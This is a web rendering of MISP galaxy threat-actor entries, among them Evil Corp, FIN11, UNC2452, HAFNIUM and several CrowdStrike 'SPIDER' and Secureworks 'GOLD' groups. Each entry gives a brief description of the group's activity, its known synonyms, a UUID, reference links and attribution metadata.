Evil Corp is an internaltional cybercrime network. In December of 2019 the US Federal Government offered a $5M bounty for information leading to the arrest and conviction of Maksim V. Yakubets for allegedly orchestrating Evil Corp operations. Responsible for stealing over $100M from businesses and consumers. The Evil Corp organization is known for utilizing custom strains of malware such as JabberZeus, Bugat and Dridex to steal banking credentials.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Evil Corp.
Known Synonyms |
---|
GOLD DRAKE |
Internal MISP references
UUID c30fbdc8-b66d-4242-a02a-e01946bc86d8
which can be used as unique global reference for Evil Corp
in MISP communities and other software using the MISP galaxy
External references
- https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/ - webarchive
- https://en.wikipedia.org/wiki/Maksim_Yakubets - webarchive
- https://www.bbc.com/news/world-us-canada-53195749 - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-drake - webarchive
- https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation - webarchive
Associated metadata
Metadata key | Value |
---|---|
TRACER KITTEN
In April 2020, Crowstrike Falcon OverWatch discovered Iran-based adversary TRACER KITTEN conducting malicious interactive activity against multiple hosts at a telecommunications company in the Europe, Middle East and Africa (EMEA) region. The actor was found operating under valid user accounts, using custom backdoors in combination with SSH tunnels for C2. The adversary leveraged their foothold to conduct a variety of reconnaissance activities, undertake credential harvesting and prepare for data exfiltration.
Internal MISP references
UUID 6cc574c0-3dfa-459c-933a-4c63490c4e93
which can be used as unique global reference for TRACER KITTEN
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IR |
targeted-sector | ['Telecoms'] |
FIN11
FIN11 is a well-established financial crime group that has recently focused its operations on ransomware and extortion. The group has been active since 2017 and has been tracked under UNC902 and later on as TEMP.Warlok. In some ways, FIN11 is reminiscent of APT1; they are notable not for their sophistication, but for their sheer volume of activity.(FireEye) Mandiant has also responded to numerous FIN11 intrusions, but we’ve only observed the group successfully monetize access in few instances. This could suggest that the actors cast a wide net during their phishing operations, then choose which victims to further exploit based on characteristics such as sector, geolocation or perceived security posture. Recently, FIN11 has deployed CLOP ransomware and threatened to publish exfiltrated data to pressure victims into paying ransom demands. The group’s shifting monetization methods—from point-of-sale (POS) malware in 2018, to ransomware in 2019, and hybrid extortion in 2020—is part of a larger trend in which criminal actors have increasingly focused on post-compromise ransomware deployment and data theft extortion. Notably, FIN11 includes a subset of the activity security researchers call TA505, Graceful Spider, Gold Evergreen, but we do not attribute TA505’s early operations to FIN11 and caution against using the names interchangeably. Attribution of both historic TA505 activity and more recent FIN11 activity is complicated by the actors’ use of criminal service providers. Like most financially motivated actors, FIN11 doesn’t operate in a vacuum. We believe that the group has used services that provide anonymous domain registration, bulletproof hosting, code signing certificates, and private or semi-private malware. Outsourcing work to these criminal service providers likely enables FIN11 to increase the scale and sophistication of their operations.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FIN11.
Known Synonyms |
---|
TEMP.Warlock |
UNC902 |
Internal MISP references
UUID c01aadc6-1087-4e8e-8d5c-a27eba409fe3
which can be used as unique global reference for FIN11
in MISP communities and other software using the MISP galaxy
External references
- https://www.fireeye.com/blog/threat-research/2019/10/shikata-ga-nai-encoder-still-going-strong.html - webarchive
- https://www.fireeye.com/blog/threat-research/2020/10/fin11-email-campaigns-precursor-for-ransomware-data-theft.html - webarchive
- https://www.brighttalk.com/webcast/7451/447347 - webarchive
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
UNC1878
UNC1878 is a financially motivated threat actor that monetizes network access via the deployment of RYUK ransomware. Earlier this year, Mandiant published a blog on a fast-moving adversary deploying RYUK ransomware, UNC1878. Shortly after its release, there was a significant decrease in observed UNC1878 intrusions and RYUK activity overall almost completely vanishing over the summer. But beginning in early fall, Mandiant has seen a resurgence of RYUK along with TTP overlaps indicating that UNC1878 has returned from the grave and resumed their operations.
Internal MISP references
UUID 3c2bb7d7-a085-4594-adc7-4a20cf724abb
which can be used as unique global reference for UNC1878
in MISP communities and other software using the MISP galaxy
External references
- https://twitter.com/anthomsec/status/1321865315513520128 - webarchive
- https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html - webarchive
- https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456 - webarchive
- https://www.youtube.com/watch?v=CgDtm05qApE - webarchive
- https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
Red Charon
Throughout 2019, multiple companies in the Taiwan high-tech ecosystem were victims of an advanced persistent threat (APT) attack. Due to these APT attacks having similar behavior profiles (similar adversarial techniques, tactics, and procedures or TTP) with each other and previously documented cyberattacks, CyCraft assess with high confidence these new attacks were conducted by the same foreign threat actor. During their investigation, they dubbed this threat actor Chimera. “Chimera” stands for the synthesis of hacker tools that they’ve seen the group use, such as the skeleton key malware that contained code extracted from both Dumpert and Mimikatz — hence Chimera. Their operation — the entirety of the new attacks utilizing the Skeleton Key attack (described below) from late 2018 to late 2019, CyCraft have dubbed Operation Skeleton Key.
Internal MISP references
UUID c8b961fe-3698-41ac-aba1-002ee3c19531
which can be used as unique global reference for Red Charon
in MISP communities and other software using the MISP galaxy
External references
- https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf - webarchive
- https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/ - webarchive
- https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf - webarchive
- https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730 - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
UNC2452
Reporting regarding activity related to the SolarWinds supply chain injection has grown quickly since initial disclosure on 13 December 2020. A significant amount of press reporting has focused on the identification of the actor(s) involved, victim organizations, possible campaign timeline, and potential impact. The US Government and cyber community have also provided detailed information on how the campaign was likely conducted and some of the malware used. MITRE’s ATT&CK team — with the assistance of contributors — has been mapping techniques used by the actor group, referred to as UNC2452/Dark Halo by FireEye and Volexity respectively, as well as SUNBURST and TEARDROP malware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular UNC2452.
Known Synonyms |
---|
DarkHalo |
Midnight Blizzard |
NOBELIUM |
Solar Phoenix |
StellarParticle |
Internal MISP references
UUID 2ee5ed7a-c4d0-40be-a837-20817474a15b
which can be used as unique global reference for UNC2452
in MISP communities and other software using the MISP galaxy
External references
- https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714 - webarchive
- https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html - webarchive
- https://news.sophos.com/en-us/2020/12/21/how-sunburst-malware-does-defense-evasion/ - webarchive
- https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/ - webarchive
- https://pastebin.com/6EDgCKxd - webarchive
- https://github.com/fireeye/sunburst_countermeasures - webarchive
- https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware - webarchive
- https://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html - webarchive
- https://unit42.paloaltonetworks.com/atoms/solarphoenix/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2024/01/25/midnight-blizzard-guidance-for-responders-on-nation-state-attack/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/08/02/midnight-blizzard-conducts-targeted-social-engineering-over-microsoft-teams/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 100 |
country | RU |
Related clusters
To see the related clusters, click here.
TeamTNT
In early Febuary, 2021 TeamTNT launched a new campaign against Docker and Kubernetes environments. Using a collection of container images that are hosted in Docker Hub, the attackers are targeting misconfigured docker daemons, Kubeflow dashboards, and Weave Scope, exploiting these environments in order to steal cloud credentials, open backdoors, mine cryptocurrency, and launch a worm that is looking for the next victim. They're linked to the First Crypto-Mining Worm to Steal AWS Credentials and Hildegard Cryptojacking malware. TeamTNT is a relatively recent addition to a growing number of threats targeting the cloud. While they employ some of the same tactics as similar groups, TeamTNT stands out with their social media presence and penchant for self-promotion. Tweets from the TeamTNT’s account are in both English and German although it is unknown if they are located in Germany.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TeamTNT.
Known Synonyms |
---|
Adept Libra |
Internal MISP references
UUID 27de6a09-844b-4dcb-9ff9-7292aad826ba
which can be used as unique global reference for TeamTNT
in MISP communities and other software using the MISP galaxy
External references
- https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/ - webarchive
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.teamtnt - webarchive
- https://blog.aquasec.com/teamtnt-campaign-against-docker-kubernetes-environment - webarchive
- https://cybersecurity.att.com/blogs/labs-research/teamtnt-delivers-malware-with-new-detection-evasion-tool - webarchive
- https://www.cadosecurity.com/post/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html - webarchive
- https://cyware.com/news/hildegard-teamtnts-new-feature-rich-malware-targeting-kubernetes-6587eb45 - webarchive
- https://www.lacework.com/teamtnt-builds-botnet-from-chinese-cloud-servers/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/adept-libra/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
HAFNIUM
HAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to HAFNIUM, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures. HAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control. Once they’ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA.In campaigns unrelated to these vulnerabilities, Microsoft has observed HAFNIUM interacting with victim Office 365 tenants. While they are often unsuccessful in compromising customer accounts, this reconnaissance activity helps the adversary identify more details about their targets’ environments. HAFNIUM operates primarily from leased virtual private servers (VPS) in the United States.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HAFNIUM.
Known Synonyms |
---|
ATK233 |
G0125 |
Operation Exchange Marauder |
Red Dev 13 |
Silk Typhoon |
Internal MISP references
UUID 4f05d6c1-3fc1-4567-91cd-dd4637cc38b5
which can be used as unique global reference for HAFNIUM
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/groups/G0125/ - webarchive
- https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers - webarchive
- https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/ - webarchive
- https://www.splunk.com/en_us/blog/security/detecting-hafnium-exchange-server-zero-day-activity-in-splunk.html - webarchive
- https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers - webarchive
- https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day - webarchive
- https://twitter.com/ESETresearch/status/1366862946488451088 - webarchive
- https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa21-062a - webarchive
- https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289 - webarchive
- https://github.com/microsoft/CSS-Exchange/tree/main/Security - webarchive
- https://github.com/cert-lv/exchange_webshell_detection - webarchive
- https://www.crowdstrike.com/blog/falcon-complete-stops-microsoft-exchange-server-zero-day-exploits - webarchive
- https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021 - webarchive
- https://pastebin.com/J4L3r2RS - webarchive
- https://www.huntress.com/blog/rapid-response-mass-exploitation-of-on-prem-exchange-servers - webarchive
- https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Execution/exchange-iis-worker-dropping-webshell.md - webarchive
- https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server - webarchive
- https://www.nextron-systems.com/2021/03/06/scan-for-hafnium-exploitation-evidence-with-thor-lite - webarchive
- https://www.thedailybeast.com/how-chinas-devastating-microsoft-hack-puts-us-all-at-risk - webarchive
- https://www.rnz.co.nz/news/political/447239/government-points-finger-at-china-over-cyber-attacks - webarchive
- https://www.gov.uk/government/news/uk-and-allies-hold-chinese-state-responsible-for-a-pervasive-pattern-of-hacking - webarchive
- https://www.foreignminister.gov.au/minister/marise-payne/media-release/australia-joins-international-partners-attribution-malicious-cyber-activity-china - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 100 |
country | CN |
Related clusters
To see the related clusters, click here.
RedEcho
RedEcho: The group made heavy use of AXIOMATICASYMPTOTE — a term we use to track infrastructure that comprises ShadowPad C2s, which is shared between several Chinese threat activity groups
Internal MISP references
UUID 986fcc3f-5f36-4975-bf5f-c42524466bbd
which can be used as unique global reference for RedEcho
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Ghostwriter
Ghostwriter is referred as an 'activity set', with various incidents tied together by overlapping behavioral characteristics and personas, rather than as an actor or group in itself.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ghostwriter.
Known Synonyms |
---|
DEV-0257 |
PUSHCHA |
Storm-0257 |
TA445 |
UAC-0057 |
UNC1151 |
Internal MISP references
UUID 749aaa11-f0fd-416b-bf6c-112f9b5930a5
which can be used as unique global reference for Ghostwriter
in MISP communities and other software using the MISP galaxy
External references
- https://www.fireeye.com/blog/threat-research/2020/07/ghostwriter-influence-campaign.html - webarchive
- https://twitter.com/hatr/status/1377220336597483520 - webarchive
- https://www.mandiant.com/resources/unc1151-linked-to-belarus-government - webarchive
- https://www.bleepingcomputer.com/news/security/meta-ukrainian-officials-military-targeted-by-ghostwriter-hackers - webarchive
- https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag - webarchive
- https://blog.google/threat-analysis-group/fog-of-war-how-the-ukraine-conflict-transformed-the-cyber-threat-landscape/ - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
- https://socprime.com/blog/uac-0057-attack-detection-a-surge-in-adversary-activity-distributing-picassoloader-and-cobalt-strike-beacon/ - webarchive
- https://socprime.com/blog/picassoloader-and-cobalt-strike-beacon-detection-uac-0057-aka-ghostwriter-hacking-group-attacks-the-ukrainian-leading-military-educational-institution/ - webarchive
- https://cert.gov.ua/article/5098518 - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Belarus |
cfr-suspected-victims | ['Germany', 'Latvia', 'Lithuania', 'Poland', 'Ukraine'] |
cfr-target-category | ['Government'] |
country | BY |
Related clusters
To see the related clusters, click here.
Yanbian Gang
RiskIQ characterizes the Yanbian Gang as a group that targeted South Korean Android mobile banking customers since 2013 with malicious Android apps purporting to be from major banks, namely Shinhan Savings Bank, Saemaul Geumgo, Shinhan Finance, KB Kookmin Bank, and NH Savings Bank.
Internal MISP references
UUID eaeae8e9-cc4b-4be8-82fd-8edc65ff9a5e
which can be used as unique global reference for Yanbian Gang
in MISP communities and other software using the MISP galaxy
External references
- https://www.riskiq.com/blog/external-threat-management/yanbian-gang-malware-distribution/ - webarchive
- https://www.trendmicro.com/en_us/research/18/k/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang.html - webarchive
- https://www.trendmicro.com/en_us/research/18/d/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing.html - webarchive
- https://www.trendmicro.com/en_us/research/18/f/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users.html - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-malware-gang-steals-millions-from-south-korean-users/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['South Korea', 'Japan'] |
TRAVELING SPIDER
Crowdstrike Tracks the criminal developer of Nemty ransomware as TRAVELING SPIDER. The actor has been observed to take advantage of single-factor authentication to gain access to victim organizations through Citrix Gateway and send extortion-related emails using the victim’s own Microsoft Office 365 instance.
Internal MISP references
UUID a515632e-3374-4602-911e-4f4e259ae0fd
which can be used as unique global reference for TRAVELING SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
MALLARD SPIDER
Crowdstrike tarcks the operators behind the Qbot as MALLARD SPIDER
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MALLARD SPIDER.
Known Synonyms |
---|
GOLD LAGOON |
Internal MISP references
UUID 08f4bfa6-8326-42b5-a9e2-d6e1c360a160
which can be used as unique global reference for MALLARD SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
RIDDLE SPIDER
According to Crowdstrike, RIDDLE SPIDER is the operator behind the avaddon ransomware
Internal MISP references
UUID 090d0553-cdcf-4f4e-ae3b-b5d751acaf5d
which can be used as unique global reference for RIDDLE SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GOLD DUPONT
GOLD DUPONT is a financially motivated cybercriminal threat group that specializes in post-intrusion ransomware attacks using 777 (aka Defray777 or RansomExx) malware. Active since November 2018, GOLD DUPONT establishes initial access into victim networks using stolen credentials to remote access services like virtual desktop infrastructure (VDI) or virtual private networks (VPN). From October 2019 to early 2020 the group used GOLD BLACKBURN's TrickBot malware as an initial access vector (IAV) during some intrusions. Since July 2020, the group has also used GOLD SWATHMORE's IcedID (Bokbot) malware as an IAV in some intrusions.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GOLD DUPONT.
Known Synonyms |
---|
SPRITE SPIDER |
Internal MISP references
UUID 3570552c-c46f-428e-9472-744a14e6ece7
which can be used as unique global reference for GOLD DUPONT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
SOLAR SPIDER
SOLAR SPIDER’s phishing campaigns deliver the JSOutProx RAT to financial institutions across Africa, the Middle East, South Asia and Southeast Asia.
Internal MISP references
UUID f65103ad-f051-47c3-b90e-c77239a4d65c
which can be used as unique global reference for SOLAR SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
targeted-sector | ['Finance'] |
VIKING SPIDER
VIKING SPIDER is the criminal group behind the development and distribution of Ragnar Locker ransomware. While public reporting indicates the group began threatening to leak victim data in February 2020, a DLS was not observed until April 2020. The DLS is hosted on Tor, and similar to other actors, proof of data exfiltration is provided before the stolen data is fully leaked. It was also noted that On Dec. 22, 2020, a new post made to MountLocker ransomware’s Tor-hosted DLS was titled 'Cartel News' and included details of a victim of VIKING SPIDER’s Ragnar Locker
Internal MISP references
UUID ffc02459-3d94-4558-bff0-2e7f0bbf70c6
which can be used as unique global reference for VIKING SPIDER
in MISP communities and other software using the MISP galaxy
External references
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/ - webarchive
- https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/ - webarchive
- https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel - webarchive
- https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
CIRCUS SPIDER
According to Crowdstrike, the NetWalker ransomware is being developed and maintained by a Russian-speaking actor designated as CIRCUS SPIDER. Initially discovered in September 2019and havinga compilation timestamp dating back to 28 August 2019, NetWalker has been found to be used in Big Game Hunting (BGH)-style operations while also being distributed via spam. CIRCUS SPIDER is advertising NetWalkeras being a closed-affiliate program,and verifies applicants before they are being accepted as an affiliate. The requirements rangefrom providing proof of previous revenue in similar affiliates programs, experience in the field and what type of industry the applicantis targeting.
Internal MISP references
UUID 3ebf503c-c554-4ac3-aa3e-3ef114ca2345
which can be used as unique global reference for CIRCUS SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RU |
GOLD EVERGREEN
GOLD EVERGREEN was a financially motivated cybercriminal threat group that operated the Gameover Zeus (aka Mapp, P2P Zeus) botnet until June 2014. It encompasses an expansive and long running criminal conspiracy operated by a confederation of individuals calling themselves The Business Club from the mid 2000s until 2014. GOLD EVERGREEN's technical operation was facilitated primarily through botnets using the Zeus, JabberZeus, and eventually Gameover Zeus malware families. These malware families were designed and maintained by a Russian national Evgeniy Bogachev (aka 'slavik') who was indicted by the U.S. DOJ in 2014 and remains a fugitive.
Internal MISP references
UUID fc1c1d9f-1432-417f-a3bf-e730ddd1d139
which can be used as unique global reference for GOLD EVERGREEN
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
BAMBOO SPIDER
Crowdstrike tracks the developer of Panda Zeus as BAMBOO SPIDER
Internal MISP references
UUID 419599eb-c1ea-4d32-8c9e-0ad61d7c5ba5
which can be used as unique global reference for BAMBOO SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
BOSON SPIDER
BOSON SPIDER is a cyber criminal group, which was first identified in 2015, recently and inexplicably went dark in the spring of 2016, appears to be a tightly knit group operating out of Eastern Europe. They have used a variety of distribution mechanisms such as the infamous (and now defunct) angler exploit kit, and obfuscated JavaScript to reduce the detection by antivirus solutions.
Internal MISP references
UUID 9c11a822-2239-42ca-a439-ee57edb44ebf
which can be used as unique global reference for BOSON SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
OVERLORD SPIDER
OVERLORD SPIDER, aka The Dark Overlord. Similar to ransomware operators today, OVERLORD SPIDER likely purchased RDP access to compromised servers on underground forums in order to exfiltrate data from corporate networks. The actor was known to attempt to “sell back” the data to the respective victims, threatening to sell the data to interested parties should the victim refuse to pay. There was at least one identified instance of OVERLORD SPIDER successfully selling victim data on an underground market.
Internal MISP references
UUID b43ce229-feaa-4731-9926-e0970140ab0b
which can be used as unique global reference for OVERLORD SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
OUTLAW SPIDER
On May 7, 2019, Mayor Bernard “Jack” Young confirmed that the network for the U.S. City of Baltimore (CoB) was infected with ransomware, which was announced via Twitter1. This infection was later confirmed to be conducted by OUTLAW SPIDER, which is the actor behind the RobbinHood ransomware. The actor demanded to be paid 3 BTC (approximately $17,600 USD at the time) per infected system, or 13 BTC (approximately $76,500 USD at the time) for all infected systems to recover the city’s files.
Internal MISP references
UUID ae121063-3960-4834-90d7-66aad69c5e8b
which can be used as unique global reference for OUTLAW SPIDER
in MISP communities and other software using the MISP galaxy
External references
- https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/ - webarchive
- https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1 - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeServicesCyberFrontLines.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
targeted-sector | ['Government, Administration'] |
MIMIC SPIDER
MIMIC SPIDER is mentioned in two summary reports only
Internal MISP references
UUID 20e2be89-a54d-46c7-a837-1f17359f30ba
which can be used as unique global reference for MIMIC SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
HOUND SPIDER
According to Crowdstrike, HOUND SPIDER affiliates arrested in Romania on December,2017
Internal MISP references
UUID 22dd1608-272c-4243-9bda-25eec834a24d
which can be used as unique global reference for HOUND SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GOLD BURLAP
GOLD BURLAP is a group of financially motivated criminals responsible for the development of the Pysa ransomware, also referred to as Mespinoza. Pysa is a cross-platform ransomware with known versions written in C++ and Python. As of December 2020, approximately 50 organizations had reportedly been targeted in Pysa ransomware attacks. The operators leverage 'name and shame' tactics to apply additional pressure to victims. As of January 2021, CTU researchers had found no Pysa advertisements on underground forums, which likely indicates that it is not operated as ransomware as a service (RaaS).
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GOLD BURLAP.
Known Synonyms |
---|
CYBORG SPIDER |
Internal MISP references
UUID d34ca487-1613-4ee5-8930-2ac8a60f945f
which can be used as unique global reference for GOLD BURLAP
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-target-category | ['Healthcare'] |
Related clusters
To see the related clusters, click here.
GOLD CABIN
GOLD CABIN is a financially motivated cybercriminal threat group operating a malware distribution service on behalf of numerous customers since 2018. GOLD CABIN uses malicious documents, often contained in password-protected archives, delivered through email to download and execute payloads. The second-stage payloads are most frequently Gozi ISFB (Ursnif) or IcedID (Bokbot), sometimes using intermediary malware like Valak. GOLD CABIN infrastructure relies on artificial appearing and frequently changing URLs created with a domain generation algorithm (DGA). The URLs host a PHP object that returns the malware as a DLL file.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GOLD CABIN.
Known Synonyms |
---|
ATK236 |
G0127 |
Monster Libra |
Shakthak |
TA551 |
Internal MISP references
UUID 36e8c848-4d20-47ea-9fc2-31aa17bf82d1
which can be used as unique global reference for GOLD CABIN
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GOLD FAIRFAX
GOLD FAIRFAX is a financially motivated cybercriminal threat group responsible for the creation, distribution, and operation of the Ramnit botnet. Ramnit, the phonetic spelling of RMNet, the internal name of the core module, began operation in April 2010 and became widespread in July 2010. A particularly virulent file-infecting component of early Ramnit variants that spreads by modifying executables and HTML files has resulted in the continued prevalence of those early variants. Currently, Ramnit remains an actively maintained and distributed threat. The intent of Ramnit is to intercept and manipulate online financial transactions through modification of web browser behavior ('man-in-the-browser').
Internal MISP references
UUID eadc8c5c-a97d-454e-8e67-475ac60749bf
which can be used as unique global reference for GOLD FAIRFAX
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GOLD FLANDERS
GOLD FLANDERS is a financially motivated group responsible for distributed denial of service (DDOS) attacks linked to extortion emails demanding between 5 and 30 bitcoins. The attacks consist mostly of fragmented UDP packets (DNS and NTP reflection) as well as other traffic that can vary per victim. The arrival of the extortion email is timed to coincide with a DDOS attack consisting of traffic between 20 Gbps and 200 Gbps and 12-15 million packets per second, lasting between 20 and 70 minutes targeted at a particular Autonomous System Number (ASN) or group of IP addresses. In some cases victim organisations have replied to these extortion emails and received personal replies from GOLD FLANDERS operators within 20 minutes.
Internal MISP references
UUID 20180cbb-27e3-49d5-922e-1e3bddc6c085
which can be used as unique global reference for GOLD FLANDERS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GOLD GALLEON
GOLD GALLEON is a financially motivated cybercriminal threat group comprised of at least 20 criminal associates that collectively carry out business email compromise (BEC) and spoofing (BES) campaigns. The group appears to specifically target maritime organizations and their customers. CTU researchers have observed GOLD GALLEON targeting firms in South Korea, Japan, Singapore, Philippines, Norway, U.S., Egypt, Saudi Arabia, and Colombia. The threat actors leverage tools, tactics, and procedures that are similar to those used by other BEC/BES groups CTU researchers have previously investigated, such as GOLD SKYLINE. The groups have used the same caliber of publicly available malware (inexpensive and commodity remote access trojans), crypters, and email lures.
Internal MISP references
UUID 6976b33c-a45b-4330-b0d8-8ef029ef830e
which can be used as unique global reference for GOLD GALLEON
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GOLD GARDEN
GOLD GARDEN was a financially motivated cybercriminal threat group that authored and operated the GandCrab ransomware from January 2018 through May 2019. GandCrab was operated as a ransomware-as-a-service operation whereby numerous affiliates distributed the malware and split ransom payments with the core operators. GOLD GARDEN maintained exclusive control of the development of GandCrab and associated command and control (C2) infrastructure. Individual affiliates, of which there were frequently more than a dozen in operation simultaneously, coordinated the distribution of GandCrab through spam emails, web exploit kits, pay-per-install botnets, and scan-and-exploit style attacks. On May 31, 2019 the operators announced they have halted operations with no intent to resume for unknown reasons. In April 2019 the operators of GOLD GARDEN transferred the source code of GandCrab to GOLD SOUTHFIELD who used it as the foundation of the REvil ransomware operation. GOLD SOUTHFIELD operates a similar affiliate program comprised largely of former GandCrab users and other groups recruited from underground forums.
Internal MISP references
UUID c0f86de9-888e-42b0-90f4-f313808533ff
which can be used as unique global reference for GOLD GARDEN
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
